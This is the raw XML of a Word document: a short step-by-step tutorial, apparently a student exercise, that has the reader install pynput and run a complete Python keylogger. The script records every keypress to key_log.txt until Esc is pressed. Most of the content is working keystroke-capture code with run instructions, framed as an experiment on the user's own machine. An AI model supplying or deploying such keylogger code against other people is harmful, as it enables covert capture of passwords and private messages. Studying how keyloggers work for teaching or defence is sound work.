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782AA" w14:textId="5FC5190D" w:rsidR="00594FEB" w:rsidRDefault="00666399">
      <w:r>
        <w:t>Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE6BA3" w14:textId="4707C2E7" w:rsidR="00666399" w:rsidRDefault="00666399">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2FF2C" w14:textId="4C71ADAD" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>1] Make a brand-new folder in VS code without any files already stored in it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74119BB0" w14:textId="4E5F07AD" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>2] Then open terminal and type this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4703CAA3" w14:textId="32C3FCE0" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>‘pip</w:t>
      </w:r>
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve"> install pynput</w:t>
      </w:r>
      <w:r>
        <w:t>’ to install pynput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D86669" w14:textId="01058447" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>3] Then make a new file and name it as ‘keylogger.py’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC0E98" w14:textId="7E1FBC73" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>4] Then paste this code in this file and run it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31740190" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>pynput.keyboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve"> import Listener, Key  # Import Key class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CC442" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399"/>
    <w:p w14:paraId="49B1F4BD" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve"># Path to store the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>keylogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B06CB8E" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>log_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve"> = "key_log.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBBD8B5" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399"/>
    <w:p w14:paraId="67757497" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t># Function to log the keys to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006A0B8" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395080D8" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t>    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606BBBAE" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">        with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>log_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>, 'a') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200BDA8E" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t>            # Write key pressed to the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC32FC" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>(str(key) + '\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CCA645" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t>    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73136BCC" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>f"Error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B73EF" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399"/>
    <w:p w14:paraId="773B775B" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t># Function to stop keylogger when a specific key is pressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5ECE9A" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3328BD31" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">    if key == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>Key.esc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>:  # Stop keylogger on pressing Esc key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEED313" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t>        return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31244450" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399"/>
    <w:p w14:paraId="575D84AE" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t># Start listening to keyboard inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7FC53" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>Listener(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>) as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257D251" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C6948" w14:textId="77777777" w:rsidR="00666399" w:rsidRPr="00666399" w:rsidRDefault="00666399" w:rsidP="00666399"/>
    <w:p w14:paraId="2B4D326E" w14:textId="73CF3459" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5] Now once the code is running smoothly, open a new terminal and type this into it and execute it (press enter):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F622D55" w14:textId="34E52C37" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666399">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666399">
        <w:t xml:space="preserve"> keylogger.py</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212C8B25" w14:textId="720A85A6" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>6] Now your key logger is running and tracking every activity of yours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD18F1" w14:textId="79F10703" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>7] To exit/terminate keylogger, press ‘esc’ key in your VS code terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555FC3F9" w14:textId="4C1EB5A3" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>8] Now the keylogger is terminated and all the data it has tracked have been saved in a file named as ‘key log’ which is a text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7BE043" w14:textId="79BD6935" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>9] You can view this file in the same folder which you created for this experiment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7A9252" w14:textId="7A6A6EDB" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399">
      <w:r>
        <w:t>10] Make sure it works only in VS code and Terminal here is the VS code terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7145E9F7" w14:textId="77777777" w:rsidR="00666399" w:rsidRDefault="00666399" w:rsidP="00666399"/>
    <w:sectPr w:rsidR="0066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E6303"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82A43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6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99"/>
    <w:rsid w:val="00101E03"/>
    <w:rsid w:val="00594FEB"/>
    <w:rsid w:val="00666399"/>
    <w:rsid w:val="00D2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C610"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{029AA5D0-94DE-4AE7-89C9-6A84B9EB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Ghaywat</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tanmay Ghaywat</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-24T17:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-24T17:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>